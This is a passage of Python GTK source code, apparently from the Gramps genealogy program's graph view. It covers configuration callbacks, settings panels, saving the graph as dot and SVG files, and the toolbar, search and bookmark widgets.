self._add_action('PrintView', self.printview, "<PRIMARY><SHIFT>P")
self._add_action('PRIMARY-J', self.jump, '<PRIMARY>J')
def _connect_db_signals(self):
"""
Set up callbacks for changes to person and family nodes.
"""
self.callman.add_db_signal('person-update', self.goto_handle)
self.callman.add_db_signal('family-update', self.goto_handle)
self.callman.add_db_signal('event-update', self.goto_handle)
def change_db(self, _db):
"""
Set up callback for changes to the database.
"""
self._change_db(_db)
self.graph_widget.scale = 1
if self.active:
if self.get_active() != "":
self.graph_widget.populate(self.get_active())
self.graph_widget.set_available(True)
else:
self.graph_widget.set_available(False)
else:
self.dirty = True
self.graph_widget.set_available(False)
def get_stock(self):
"""
The category stock icon.
"""
return 'gramps-pedigree'
def get_viewtype_stock(self):
"""
Type of view in category.
"""
return 'gramps-pedigree'
def build_widget(self):
"""
Builds the widget with canvas and controls.
"""
self.graph_widget = GraphWidget(self, self.dbstate, self.uistate)
return self.graph_widget.get_widget()
def build_tree(self):
"""
There is no separate step to fill the widget with data.
The data is populated as part of canvas widget construction.
It can be called to rebuild tree.
"""
if self.active:
if self.get_active() != "":
self.graph_widget.populate(self.get_active())
additional_ui = [ # Defines the UI string for UIManager
'''
<placeholder id="CommonGo">
<section>
<item>
<attribute name="action">win.Back</attribute>
<attribute name="label" translatable="yes">_Back</attribute>
</item>
<item>
<attribute name="action">win.Forward</attribute>
<attribute name="label" translatable="yes">_Forward</attribute>
</item>
</section>
<section>
<item>
<attribute name="action">win.HomePerson</attribute>
<attribute name="label" translatable="yes">_Home</attribute>
</item>
</section>
</placeholder>
''',
'''
<section id='CommonEdit' groups='RW'>
<item>
<attribute name="action">win.PrintView</attribute>
<attribute name="label" translatable="yes">_Print...</attribute>
</item>
</section>
''', # Following are the Toolbar items
'''
<placeholder id='CommonNavigation'>
<child groups='RO'>
<object class="GtkToolButton">
<property name="icon-name">go-previous</property>
<property name="action-name">win.Back</property>
<property name="tooltip_text" translatable="yes">'''
'''Go to the previous object in the history</property>
<property name="label" translatable="yes">_Back</property>
<property name="use-underline">True</property>
</object>
<packing>
<property name="homogeneous">False</property>
</packing>
</child>
<child groups='RO'>
<object class="GtkToolButton">
<property name="icon-name">go-next</property>
<property name="action-name">win.Forward</property>
<property name="tooltip_text" translatable="yes">'''
'''Go to the next object in the history</property>
<property name="label" translatable="yes">_Forward</property>
<property name="use-underline">True</property>
</object>
<packing>
<property name="homogeneous">False</property>
</packing>
</child>
<child groups='RO'>
<object class="GtkToolButton">
<property name="icon-name">go-home</property>
<property name="action-name">win.HomePerson</property>
<property name="tooltip_text" translatable="yes">'''
'''Go to the default person</property>
<property name="label" translatable="yes">_Home</property>
<property name="use-underline">True</property>
</object>
<packing>
<property name="homogeneous">False</property>
</packing>
</child>
</placeholder>
''',
'''
<placeholder id='BarCommonEdit'>
<child groups='RO'>
<object class="GtkToolButton">
<property name="icon-name">document-print</property>
<property name="action-name">win.PrintView</property>
<property name="tooltip_text" translatable="yes">"Save the dot file '''
'''for a later print.\nThis will save a .gv file and a svg file.\n'''
'''You must select a .gv file"</property>
<property name="label" translatable="yes">_Print...</property>
<property name="use-underline">True</property>
</object>
<packing>
<property name="homogeneous">False</property>
</packing>
</child>
</placeholder>
''']
def navigation_type(self):
"""
The type of forward and backward navigation to perform.
"""
return 'Person'
def goto_handle(self, handle):
"""
Go to a named handle.
"""
if self.active:
if self.get_active() != "":
self.graph_widget.populate(self.get_active())
self.graph_widget.set_available(True)
else:
self.dirty = True
self.graph_widget.set_available(False)
def change_active_person(self, _menuitem=None, person_handle=''):
"""
Change active person.
"""
if person_handle:
self.change_active(person_handle)
def can_configure(self):
"""
        See :class:`~gui.views.pageview.PageView`
:return: bool
"""
return True
def cb_update_show_images(self, _client, _cnxn_id, entry, _data):
"""
Called when the configuration menu changes the images setting.
"""
self.show_images = entry == 'True'
self.graph_widget.populate(self.get_active())
def cb_update_show_avatars(self, _client, _cnxn_id, entry, _data):
"""
Called when the configuration menu changes the avatars setting.
"""
self.show_avatars = entry == 'True'
self.graph_widget.populate(self.get_active())
def cb_update_avatars_style(self, _client, _cnxn_id, entry, _data):
"""
        Called when the configuration menu changes the avatar style setting.
"""
for widget in self.avatar_widgets:
widget.set_visible(entry == '0')
self.graph_widget.populate(self.get_active())
def cb_on_combo_show(self, combobox):
"""
        Called when the configuration menu shows the combobox widget for avatars.
Used to hide custom avatars settings.
"""
for widget in self.avatar_widgets:
widget.set_visible(combobox.get_active() == 0)
def cb_male_avatar_set(self, file_chooser_button):
"""
Called when the configuration menu changes the male avatar.
"""
self._config.set('interface.graphview-avatars-male',
file_chooser_button.get_filename())
self.graph_widget.populate(self.get_active())
def cb_female_avatar_set(self, file_chooser_button):
"""
Called when the configuration menu changes the female avatar.
"""
self._config.set('interface.graphview-avatars-female',
file_chooser_button.get_filename())
self.graph_widget.populate(self.get_active())
def cb_update_show_full_dates(self, _client, _cnxn_id, entry, _data):
"""
Called when the configuration menu changes the date setting.
"""
self.show_full_dates = entry == 'True'
self.graph_widget.populate(self.get_active())
def cb_update_show_places(self, _client, _cnxn_id, entry, _data):
"""
Called when the configuration menu changes the place setting.
"""
self.show_places = entry == 'True'
self.graph_widget.populate(self.get_active())
def cb_update_place_fmt(self, _client, _cnxn_id, _entry, _data):
"""
Called when the configuration menu changes the place setting.
"""
self.graph_widget.populate(self.get_active())
def cb_update_show_tag_color(self, _client, _cnxn_id, entry, _data):
"""
Called when the configuration menu changes the show tags setting.
"""
self.show_tag_color = entry == 'True'
self.graph_widget.populate(self.get_active())
def cb_update_show_lines(self, _client, _cnxn_id, _entry, _data):
"""
Called when the configuration menu changes the line setting.
"""
self.graph_widget.populate(self.get_active())
def cb_update_highlight_home_person(self, _client, _cnxn_id, entry, _data):
"""
Called when the configuration menu changes the highlight home
person setting.
"""
self.highlight_home_person = entry == 'True'
self.graph_widget.populate(self.get_active())
def cb_update_home_path_color(self, _client, _cnxn_id, entry, _data):
"""
Called when the configuration menu changes the path person color.
"""
self.home_path_color = entry
self.graph_widget.populate(self.get_active())
def cb_update_desc_generations(self, _client, _cnxd_id, entry, _data):
"""
Called when the configuration menu changes the descendant generation
count setting.
"""
self.descendant_generations = entry
self.graph_widget.populate(self.get_active())
def cb_update_ancestor_generations(self, _client, _cnxd_id, entry, _data):
"""
Called when the configuration menu changes the ancestor generation
count setting.
"""
self.ancestor_generations = entry
self.graph_widget.populate(self.get_active())
def cb_update_show_animation(self, _client, _cnxd_id, entry, _data):
"""
Called when the configuration menu changes the show animation
setting.
"""
if entry == 'True':
self.graph_widget.animation.show_animation = True
# enable animate options
for widget in self.ani_widgets:
widget.set_sensitive(True)
else:
self.graph_widget.animation.show_animation = False
            # disable animate options
for widget in self.ani_widgets:
widget.set_sensitive(False)
def cb_update_animation_count(self, _client, _cnxd_id, entry, _data):
"""
Called when the configuration menu changes the animation count
setting.
"""
self.graph_widget.animation.max_count = int(entry) * 2
def cb_update_animation_speed(self, _client, _cnxd_id, entry, _data):
"""
Called when the configuration menu changes the animation speed
setting.
"""
self.graph_widget.animation.speed = 50 * int(entry)
def cb_update_search_all_db(self, _client, _cnxn_id, entry, _data):
"""
Called when the configuration menu changes the search setting.
"""
value = entry == 'True'
self.graph_widget.search_widget.set_options(search_all_db=value)
def cb_update_search_show_images(self, _client, _cnxn_id, entry, _data):
"""
Called when the configuration menu changes the search setting.
"""
value = entry == 'True'
self.graph_widget.search_widget.set_options(show_images=value)
self.graph_widget.show_images_option = value
def cb_update_search_marked_first(self, _client, _cnxn_id, entry, _data):
"""
Called when the configuration menu changes the search setting.
"""
value = entry == 'True'
self.graph_widget.search_widget.set_options(marked_first=value)
def cb_update_spacing(self, _client, _cnxd_id, _entry, _data):
"""
Called when the ranksep or nodesep setting changed.
"""
self.graph_widget.populate(self.get_active())
def cb_update_person_theme(self, _client, _cnxd_id, _entry, _data):
"""
Called when person theme setting changed.
"""
self.graph_widget.populate(self.get_active())
def cb_show_all_connected(self, _client, _cnxd_id, _entry, _data):
"""
Called when show all connected setting changed.
"""
value = _entry == 'True'
self.graph_widget.all_connected_btn.set_active(value)
self.graph_widget.populate(self.get_active())
def config_change_font(self, font_button):
"""
        Called when the font is changed.
"""
font_family = font_button.get_font_family()
if font_family is not None:
font_name = font_family.get_name()
else:
font_name = ''
# apply Pango.SCALE=1024 to font size
font_size = int(font_button.get_font_size() / 1024)
self._config.set('interface.graphview-font', [font_name, font_size])
self.graph_widget.retest_font = True
self.graph_widget.populate(self.get_active())
def config_connect(self):
"""
        Overwritten from the :class:`~gui.views.pageview.PageView` method.
This method will be called after the ini file is initialized,
use it to monitor changes in the ini file.
"""
self._config.connect('interface.graphview-show-images',
self.cb_update_show_images)
self._config.connect('interface.graphview-show-avatars',
self.cb_update_show_avatars)
self._config.connect('interface.graphview-avatars-style',
self.cb_update_avatars_style)
self._config.connect('interface.graphview-show-full-dates',
self.cb_update_show_full_dates)
self._config.connect('interface.graphview-show-places',
self.cb_update_show_places)
self._config.connect('interface.graphview-place-format',
self.cb_update_place_fmt)
self._config.connect('interface.graphview-show-tags',
self.cb_update_show_tag_color)
self._config.connect('interface.graphview-show-lines',
self.cb_update_show_lines)
self._config.connect('interface.graphview-highlight-home-person',
self.cb_update_highlight_home_person)
self._config.connect('interface.graphview-home-path-color',
self.cb_update_home_path_color)
self._config.connect('interface.graphview-descendant-generations',
self.cb_update_desc_generations)
self._config.connect('interface.graphview-ancestor-generations',
self.cb_update_ancestor_generations)
self._config.connect('interface.graphview-show-animation',
self.cb_update_show_animation)
self._config.connect('interface.graphview-animation-speed',
self.cb_update_animation_speed)
self._config.connect('interface.graphview-animation-count',
self.cb_update_animation_count)
self._config.connect('interface.graphview-search-all-db',
self.cb_update_search_all_db)
self._config.connect('interface.graphview-search-show-images',
self.cb_update_search_show_images)
self._config.connect('interface.graphview-search-marked-first',
self.cb_update_search_marked_first)
self._config.connect('interface.graphview-ranksep',
self.cb_update_spacing)
self._config.connect('interface.graphview-nodesep',
self.cb_update_spacing)
self._config.connect('interface.graphview-person-theme',
self.cb_update_person_theme)
self._config.connect('interface.graphview-show-all-connected',
self.cb_show_all_connected)
def _get_configure_page_funcs(self):
"""
Return a list of functions that create gtk elements to use in the
notebook pages of the Configure dialog.
:return: list of functions
"""
return [self.layout_config_panel,
self.theme_config_panel,
self.animation_config_panel,
self.search_config_panel]
def layout_config_panel(self, configdialog):
"""
Function that builds the widget in the configuration dialog.
See "gramps/gui/configure.py" for details.
"""
grid = Gtk.Grid()
grid.set_border_width(12)
grid.set_column_spacing(6)
grid.set_row_spacing(6)
row = 0
configdialog.add_checkbox(
grid, _('Show images'), row, 'interface.graphview-show-images')
row += 1
configdialog.add_checkbox(
grid, _('Show avatars'), row, 'interface.graphview-show-avatars')
row += 1
configdialog.add_checkbox(
grid, _('Highlight the home person'),
row, 'interface.graphview-highlight-home-person')
row += 1
configdialog.add_checkbox(
grid, _('Show full dates'),
row, 'interface.graphview-show-full-dates')
row += 1
configdialog.add_checkbox(
grid, _('Show places'), row, 'interface.graphview-show-places')
row += 1
# Place format:
p_fmts = [(0, _("Default"))]
for (indx, fmt) in enumerate(place_displayer.get_formats()):
p_fmts.append((indx + 1, fmt.name))
active = self._config.get('interface.graphview-place-format')
if active >= len(p_fmts):
active = 1
configdialog.add_combo(grid, _('Place format'), row,
'interface.graphview-place-format',
p_fmts, setactive=active)
row += 1
configdialog.add_checkbox(
grid, _('Show tags'), row, 'interface.graphview-show-tags')
return _('Layout'), grid
def theme_config_panel(self, configdialog):
"""
Function that builds the widget in the configuration dialog.
See "gramps/gui/configure.py" for details.
"""
grid = Gtk.Grid()
grid.set_border_width(12)
grid.set_column_spacing(6)
grid.set_row_spacing(6)
p_themes = DotSvgGenerator(self.dbstate, self).get_person_themes()
themes_list = []
for t in p_themes:
themes_list.append((t[0], t[1]))
row = 0
configdialog.add_combo(grid, _('Person theme'), row,
'interface.graphview-person-theme',
themes_list)
row += 1
configdialog.add_color(grid,
_('Path color to home person'),
row, 'interface.graphview-home-path-color',
col=1)
row += 1
font_lbl = Gtk.Label(label=_('Font:'), xalign=0)
grid.attach(font_lbl, 1, row, 1, 1)
font = self._config.get('interface.graphview-font')
font_str = '%s, %d' % (font[0], font[1])
font_btn = Gtk.FontButton.new_with_font(font_str)
font_btn.set_show_style(False)
grid.attach(font_btn, 2, row, 1, 1)
font_btn.connect('font-set', self.config_change_font)
font_btn.set_filter_func(self.font_filter_func)
# Avatars options
# ===================================================================
row += 1
avatars = Avatars(self._config)
combo = configdialog.add_combo(grid, _('Avatars style'), row,
'interface.graphview-avatars-style',
avatars.get_styles_list())
combo.connect('show', self.cb_on_combo_show)
file_filter = Gtk.FileFilter()
file_filter.set_name(_('PNG files'))
file_filter.add_pattern("*.png")
self.avatar_widgets.clear()
row += 1
lbl = Gtk.Label(label=_('Male avatar:'), halign=Gtk.Align.END)
FCB_male = Gtk.FileChooserButton.new(_('Choose male avatar'),
Gtk.FileChooserAction.OPEN)
FCB_male.add_filter(file_filter)
FCB_male.set_filename(
self._config.get('interface.graphview-avatars-male'))
FCB_male.connect('file-set', self.cb_male_avatar_set)
grid.attach(lbl, 1, row, 1, 1)
grid.attach(FCB_male, 2, row, 1, 1)
self.avatar_widgets.append(lbl)
self.avatar_widgets.append(FCB_male)
row += 1
lbl = Gtk.Label(label=_('Female avatar:'), halign=Gtk.Align.END)
FCB_female = Gtk.FileChooserButton.new(_('Choose female avatar'),
Gtk.FileChooserAction.OPEN)
FCB_female.connect('file-set', self.cb_female_avatar_set)
FCB_female.add_filter(file_filter)
FCB_female.set_filename(
self._config.get('interface.graphview-avatars-female'))
grid.attach(lbl, 1, row, 1, 1)
grid.attach(FCB_female, 2, row, 1, 1)
self.avatar_widgets.append(lbl)
self.avatar_widgets.append(FCB_female)
# ===================================================================
return _('Themes'), grid
def animation_config_panel(self, configdialog):
"""
Function that builds the widget in the configuration dialog.
See "gramps/gui/configure.py" for details.
"""
grid = Gtk.Grid()
grid.set_border_width(12)
grid.set_column_spacing(6)
grid.set_row_spacing(6)
configdialog.add_checkbox(
grid, _('Show animation'),
0, 'interface.graphview-show-animation')
self.ani_widgets.clear()
widget = configdialog.add_spinner(
grid, _('Animation speed (1..5, where 5 is the slowest)'),
1, 'interface.graphview-animation-speed', (1, 5))
self.ani_widgets.append(widget)
widget = configdialog.add_spinner(
grid, _('Animation count (0..8, use 0 to turn off)'),
2, 'interface.graphview-animation-count', (0, 8))
self.ani_widgets.append(widget)
# disable animate options if needed
if not self.graph_widget.animation.show_animation:
for widget in self.ani_widgets:
widget.set_sensitive(False)
return _('Animation'), grid
def search_config_panel(self, configdialog):
"""
Function that builds the widget in the configuration dialog.
See "gramps/gui/configure.py" for details.
"""
grid = Gtk.Grid()
grid.set_border_width(12)
grid.set_column_spacing(6)
grid.set_row_spacing(6)
row = 0
widget = configdialog.add_checkbox(
grid, _('Search in the whole database'), row,
'interface.graphview-search-all-db')
widget.set_tooltip_text(_("Also apply the search to the whole database."))
row += 1
widget = configdialog.add_checkbox(
grid, _('Show person images'), row,
'interface.graphview-search-show-images')
widget.set_tooltip_text(
_("Show persons thumbnails in search result list."))
row += 1
widget = configdialog.add_checkbox(
grid, _('Show bookmarked first'), row,
'interface.graphview-search-marked-first')
widget.set_tooltip_text(
_("Show bookmarked persons first in search result list."))
return _('Search'), grid
def font_filter_func(self, _family, face):
"""
Filter function to display only regular fonts.
"""
desc = face.describe()
stretch = desc.get_stretch()
if stretch != Pango.Stretch.NORMAL:
return False # avoid Condensed or Expanded
sty = desc.get_style()
if sty != Pango.Style.NORMAL:
return False # avoid italic etc.
weight = desc.get_weight()
if weight != Pango.Weight.NORMAL:
return False # avoid Bold
return True
#-------------------------------------------------------------------------
#
# Printing functionalities
#
#-------------------------------------------------------------------------
def printview(self, *obj):
"""
Save the dot file for later printing with an appropriate tool.
"""
# ask for the dot file name
filter1 = Gtk.FileFilter()
filter1.set_name("dot files")
filter1.add_pattern("*.gv")
dot = Gtk.FileChooserDialog(title=_("Select a dot file name"),
action=Gtk.FileChooserAction.SAVE,
transient_for=self.uistate.window)
dot.add_button(_('_Cancel'), Gtk.ResponseType.CANCEL)
dot.add_button(_('_Apply'), Gtk.ResponseType.OK)
mpath = config.get('paths.report-directory')
dot.set_current_folder(os.path.dirname(mpath))
dot.set_filter(filter1)
dot.set_current_name("Graphview.gv")
status = dot.run()
if status == Gtk.ResponseType.OK:
val = dot.get_filename()
(spath, _ext) = os.path.splitext(val)
val = spath + ".gv" # used to avoid filename without extension
# selected path is an existing file and we need a file
if os.path.isfile(val):
aaa = OptionDialog(_('File already exists'), # parent-OK
_('You can choose to either overwrite the '
'file, or change the selected filename.'),
_('_Overwrite'), None,
_('_Change filename'), None,
parent=dot)
if aaa.get_response() == Gtk.ResponseType.YES:
dot.destroy()
self.printview(obj)
return
svg = val.replace('.gv', '.svg')
# both dot_data and svg_data are bytes, already utf-8 encoded
# just write them as binary
try:
with open(val, 'wb') as __g, open(svg, 'wb') as __s:
__g.write(self.graph_widget.dot_data)
__s.write(self.graph_widget.svg_data)
except IOError as msg:
msg2 = _("Could not create %s") % (val + ', ' + svg)
ErrorDialog(msg2, str(msg), parent=dot)
dot.destroy()
#-------------------------------------------------------------------------
#
# GraphWidget
#
#-------------------------------------------------------------------------
class GraphWidget(object):
"""
Define the widget with controls and canvas that displays the graph.
"""
def __init__(self, view, dbstate, uistate):
"""
:type view: GraphView
"""
# variables for drag and scroll
self._last_x = 0
self._last_y = 0
self._in_move = False
self.view = view
self.dbstate = dbstate
self.uistate = uistate
self.parser = None
self.active_person_handle = None
self.actions = Actions(dbstate, uistate, self.view.bookmarks)
self.actions.connect('rebuild-graph', self.view.build_tree)
self.actions.connect('active-changed', self.populate)
self.actions.connect('focus-person-changed', self.set_person_to_focus)
self.dot_data = None
self.svg_data = None
scrolled_win = Gtk.ScrolledWindow()
scrolled_win.set_shadow_type(Gtk.ShadowType.IN)
self.hadjustment = scrolled_win.get_hadjustment()
self.vadjustment = scrolled_win.get_vadjustment()
self.canvas = GooCanvas.Canvas()
self.canvas.connect("scroll-event", self.scroll_mouse)
self.canvas.props.units = Gtk.Unit.POINTS
self.canvas.props.resolution_x = 72
self.canvas.props.resolution_y = 72
scrolled_win.add(self.canvas)
self.vbox = Gtk.Box(homogeneous=False, spacing=4,
orientation=Gtk.Orientation.VERTICAL)
self.vbox.set_border_width(4)
self.toolbar = Gtk.Box(homogeneous=False, spacing=4,
orientation=Gtk.Orientation.HORIZONTAL)
self.vbox.pack_start(self.toolbar, False, False, 0)
# add zoom-in button
self.zoom_in_btn = Gtk.Button.new_from_icon_name('zoom-in',
Gtk.IconSize.MENU)
self.zoom_in_btn.set_tooltip_text(_('Zoom in'))
self.toolbar.pack_start(self.zoom_in_btn, False, False, 1)
self.zoom_in_btn.connect("clicked", self.zoom_in)
# add zoom-out button
self.zoom_out_btn = Gtk.Button.new_from_icon_name('zoom-out',
Gtk.IconSize.MENU)
self.zoom_out_btn.set_tooltip_text(_('Zoom out'))
self.toolbar.pack_start(self.zoom_out_btn, False, False, 1)
self.zoom_out_btn.connect("clicked", self.zoom_out)
# add original zoom button
self.orig_zoom_btn = Gtk.Button.new_from_icon_name('zoom-original',
Gtk.IconSize.MENU)
self.orig_zoom_btn.set_tooltip_text(_('Zoom to original'))
self.toolbar.pack_start(self.orig_zoom_btn, False, False, 1)
self.orig_zoom_btn.connect("clicked", self.set_original_zoom)
# add best fit button
self.fit_btn = Gtk.Button.new_from_icon_name('zoom-fit-best',
Gtk.IconSize.MENU)
self.fit_btn.set_tooltip_text(_('Zoom to best fit'))
self.toolbar.pack_start(self.fit_btn, False, False, 1)
self.fit_btn.connect("clicked", self.fit_to_page)
# add 'go to active person' button
self.goto_active_btn = Gtk.Button.new_from_icon_name('go-jump',
Gtk.IconSize.MENU)
self.goto_active_btn.set_tooltip_text(_('Go to active person'))
self.toolbar.pack_start(self.goto_active_btn, False, False, 1)
self.goto_active_btn.connect("clicked", self.goto_active)
# add 'go to bookmark' button
self.goto_other_btn = Gtk.Button(label=_('Go to bookmark'))
self.goto_other_btn.set_tooltip_text(
_('Center view on selected bookmark'))
self.toolbar.pack_start(self.goto_other_btn, False, False, 1)
self.bkmark_popover = Popover(_('Bookmarks for current graph'),
_('Other Bookmarks'),
ext_panel=self.build_bkmark_ext_panel())
self.bkmark_popover.set_relative_to(self.goto_other_btn)
self.goto_other_btn.connect("clicked", self.show_bkmark_popup)
self.goto_other_btn.connect("key-press-event",
self.goto_other_btn_key_press_event)
self.bkmark_popover.connect('item-activated', self.activate_popover)
self.show_images_option = self.view._config.get(
'interface.graphview-search-show-images')
# add search widget
self.search_widget = SearchWidget(self.dbstate,
self.get_person_image,
bookmarks=self.view.bookmarks)
search_box = self.search_widget.get_widget()
self.toolbar.pack_start(search_box, True, True, 1)
self.search_widget.set_options(
search_all_db=self.view._config.get(
'interface.graphview-search-all-db'),
show_images=self.show_images_option)
self.search_widget.connect('item-activated', self.activate_popover)
# add accelerator to focus search entry
accel_group = Gtk.AccelGroup()
self.uistate.window.add_accel_group(accel_group)
search_box.add_accelerator('grab-focus', accel_group, Gdk.KEY_f,
Gdk.ModifierType.CONTROL_MASK,
Gtk.AccelFlags.VISIBLE)
# add spinners for quick generations change
gen_box = Gtk.Box(orientation=Gtk.Orientation.VERTICAL)
box = self.build_spinner('go-up-symbolic', 0, 50,
_('Ancestor generations'),
'interface.graphview-ancestor-generations')
gen_box.add(box)
box = self.build_spinner('go-down-symbolic', 0, 50,
_('Descendant generations'),
'interface.graphview-descendant-generations')
gen_box.add(box)
# pack generation spinners to popover
gen_btn = Gtk.Button(label=_('Generations'))
self.add_popover(gen_btn, gen_box)
self.toolbar.pack_start(gen_btn, False, False, 1)
# add spinner for generation (vertical) spacing
spacing_box = Gtk.Box(orientation=Gtk.Orientation.VERTICAL)
box = self.build_spinner('object-flip-vertical', 1, 50,
_('Vertical spacing between generations'),
'interface.graphview-ranksep')
spacing_box.add(box)
# add spinner for node (horizontal) spacing
box = self.build_spinner('object-flip-horizontal', 1, 50,
_('Horizontal spacing between nodes'),
'interface.graphview-nodesep')
spacing_box.add(box)
# pack spacing spinners to popover
spacing_btn = Gtk.Button(label=_('Spacings'))
self.add_popover(spacing_btn, spacing_box)
self.toolbar.pack_start(spacing_btn, False, False, 1)
# add button to show all connected persons
self.all_connected_btn = Gtk.ToggleButton(label=_('All connected'))
self.all_connected_btn.set_tooltip_text(
_("Show all connected persons limited by generation restrictions.\n"
"Works slow, so don't set large generation values."))
self.all_connected_btn.set_active(
self.view._config.get('interface.graphview-show-all-connected'))
self.all_connected_btn.connect('clicked', self.toggle_all_connected)
self.toolbar.pack_start(self.all_connected_btn, False, False, 1)
self.vbox.pack_start(scrolled_win, True, True, 0)
# if the graph is larger than the graphviz paper size,
# this coefficient is needed
self.transform_scale = 1
self.scale = 1
self.animation = CanvasAnimation(self.view, self.canvas, scrolled_win)
self.search_widget.set_items_list(self.animation.items_list)
# person that will focus (once) after graph rebuilding
self.person_to_focus = None
# for detecting double click
self.click_events = []
# for timeout on changing settings by spinners
self.timeout_event = False
# Gtk style context for scrollwindow to operate with theme colors
self.sw_style_context = scrolled_win.get_style_context()
# used for popup menu, prevent destroy menu as local variable
self.menu = None
self.retest_font = True # flag indicates need to resize font
self.bold_size = self.norm_size = 0 # font sizes to send to dot
def add_popover(self, widget, container):
"""
Add popover for button.
"""
popover = Gtk.Popover()
popover.set_relative_to(widget)
popover.add(container)
widget.connect("clicked", self.spinners_popup, popover)
container.show_all()
def build_spinner(self, icon, start, end, tooltip, conf_const):
"""
Build a spinner with an icon and pack it into a box.
Changes are applied to the config with a delay.
"""
box = Gtk.Box(orientation=Gtk.Orientation.HORIZONTAL)
img = Gtk.Image.new_from_icon_name(icon, Gtk.IconSize.MENU)
box.pack_start(img, False, False, 1)
spinner = Gtk.SpinButton.new_with_range(start, end, 1)
spinner.set_tooltip_text(tooltip)
spinner.set_value(self.view._config.get(conf_const))
spinner.connect("value-changed", self.apply_spinner_delayed,
conf_const)
box.pack_start(spinner, False, False, 1)
return box
def toggle_all_connected(self, widget):
"""
Change state for "Show all connected" setting.
"""
self.view._config.set('interface.graphview-show-all-connected',
widget.get_active())
def spinners_popup(self, _widget, popover):
"""
Show the popover for the generations and spacing params.
The popup call differs depending on the gtk version.
"""
if gtk_version >= 3.22:
popover.popup()
else:
popover.show()
def set_available(self, state):
"""
Set state for GraphView.
"""
if not state:
# if no database is opened
self.clear()
self.toolbar.set_sensitive(state)
def font_changed(self, active):
self.sym_font = config.get('utf8.selected-font')
if self.parser:
self.parser.font_changed()
self.populate(active)
def set_person_to_focus(self, handle):
"""
Set person that will focus (once) after graph rebuilding.
"""
self.person_to_focus = handle
def goto_other_btn_key_press_event(self, _widget, event):
"""
Handle key presses on the bookmarks button: 'Esc' hides the popup,
'Down' moves focus to the popover.
"""
key = event.keyval
if event.keyval == Gdk.KEY_Escape:
self.hide_bkmark_popover()
elif key == Gdk.KEY_Down:
self.bkmark_popover.grab_focus()
return True
def activate_popover(self, _widget, person_handle):
"""
Called when an item (person)
in the search or bookmarks popup (popover) is activated.
"""
self.hide_bkmark_popover()
self.search_widget.hide_search_popover()
# move view to person with animation
self.move_to_person(None, person_handle, True)
def apply_spinner_delayed(self, widget, conf_const):
"""
Set params by spinners (generations, spacing).
Use timeout for better interface responsiveness.
"""
value = int(widget.get_value())
# try to remove the planned event (setting change)
if self.timeout_event and \
not self.timeout_event.is_destroyed():
GLib.source_remove(self.timeout_event.get_id())
# timeout saving setting for better interface responsiveness
event_id = GLib.timeout_add(300, self.view._config.set,
conf_const, value)
context = GLib.main_context_default()
self.timeout_event = context.find_source_by_id(event_id)
def build_bkmark_ext_panel(self):
"""
Build the extension panel for the bookmark popover.
"""
btn_box = Gtk.Box(orientation=Gtk.Orientation.HORIZONTAL)
# add button to add active person to bookmarks
# tooltip will be changed in "self.load_bookmarks"
self.add_bkmark = Gtk.Button(label=_('Add active person'))
self.add_bkmark.connect("clicked", self.add_active_to_bkmarks)
btn_box.pack_start(self.add_bkmark, True, True, 2)
# add button to call the bookmarks manager
manage_bkmarks = Gtk.Button(label=_('Edit'))
manage_bkmarks.set_tooltip_text(_('Call the bookmark editor'))
manage_bkmarks.connect("clicked", self.edit_bookmarks)
btn_box.pack_start(manage_bkmarks, True, True, 2)
return btn_box
def load_bookmarks(self):
"""
Load bookmarks in Popover (goto_other_btn).
"""
# remove all old items from popup
self.bkmark_popover.clear_items()
active = self.view.get_active()
active_in_bkmarks = False
found = False
found_other = False
count = 0
count_other = 0
bookmarks = self.view.bookmarks.get_bookmarks().bookmarks
for bkmark in bookmarks:
if active == bkmark:
active_in_bkmarks = True
person = self.dbstate.db.get_person_from_handle(bkmark)
if person:
name = displayer.display_name(person.get_primary_name())
present = self.animation.get_item_by_title(bkmark)
hbox = Gtk.Box(orientation=Gtk.Orientation.HORIZONTAL,
spacing=10)
# add person ID
label = Gtk.Label("[%s]" % person.gramps_id, xalign=0)
hbox.pack_start(label, False, False, 2)
# add person name
label = Gtk.Label(name, xalign=0)
hbox.pack_start(label, True, True, 2)
# add person image if needed
if self.show_images_option:
person_image = self.get_person_image(person, 32, 32)
if person_image:
hbox.pack_start(person_image, False, True, 2)
row = ListBoxRow(person_handle=bkmark, label=name,
db=self.dbstate.db)
row.add(hbox)
if present is not None:
found = True
count += 1
self.bkmark_popover.main_panel.add_to_panel(row)
else:
found_other = True
count_other += 1
self.bkmark_popover.other_panel.add_to_panel(row)
row.show_all()
if not found and not found_other:
self.bkmark_popover.show_other_panel(False)
row = ListBoxRow()
row.add(Gtk.Label(_("You don't have any bookmarks yet...\n"
"Try to add some frequently used persons "
"to speedup navigation.")))
self.bkmark_popover.main_panel.add_to_panel(row)
row.show_all()
else:
if not found:
row = ListBoxRow()
row.add(Gtk.Label(_('No bookmarks for this graph...')))
self.bkmark_popover.main_panel.add_to_panel(row)
row.show_all()
if not found_other:
row = ListBoxRow()
row.add(Gtk.Label(_('No other bookmarks...')))
self.bkmark_popover.other_panel.add_to_panel(row)
row.show_all()
self.bkmark_popover.show_other_panel(True)
self.bkmark_popover.main_panel.set_progress(0, _('found: %s') % count)
self.bkmark_popover.other_panel.set_progress(
0, _('found: %s') % count_other)
# set tooltip for "add_bkmark" button
self.add_bkmark.hide()
if active and not active_in_bkmarks:
person = self.dbstate.db.get_person_from_handle(active)
if person:
name = displayer.display_name(person.get_primary_name())
val_to_display = "[%s] %s" % (person.gramps_id, name)
self.add_bkmark.set_tooltip_text(
_('Add active person to bookmarks\n'
'%s') % val_to_display)
self.add_bkmark.show()
def get_person_image(self, person, width=-1, height=-1, kind='image'):
"""
kind - 'image', 'path' or 'both'.
Return the person's image and/or its path, or None if no usable
image is found.
"""
# see if we have an image to use for this person
image_path = None
media_list = person.get_media_list()
if media_list:
media_handle = media_list[0].get_reference_handle()
media = self.dbstate.db.get_media_from_handle(media_handle)
media_mime_type = media.get_mime_type()
if media_mime_type[0:5] == "image":
rectangle = media_list[0].get_rectangle()
path = media_path_full(self.dbstate.db, media.get_path())
image_path = get_thumbnail_path(path, rectangle=rectangle)
# test if thumbnail actually exists in thumbs
# (import of data means media files might not be present)
image_path = find_file(image_path)
if image_path:
if kind == 'path':
return image_path
# get and scale image
person_image = GdkPixbuf.Pixbuf.new_from_file_at_scale(
filename=image_path,
width=width, height=height,
preserve_aspect_ratio=True)
person_image = Gtk.Image.new_from_pixbuf(person_image)
if kind == 'image':
return person_image
elif kind == 'both':
return person_image, image_path
return None
def add_active_to_bkmarks(self, _widget):
"""
Add active person to bookmarks.
"""
self.view.add_bookmark(None)
self.load_bookmarks()
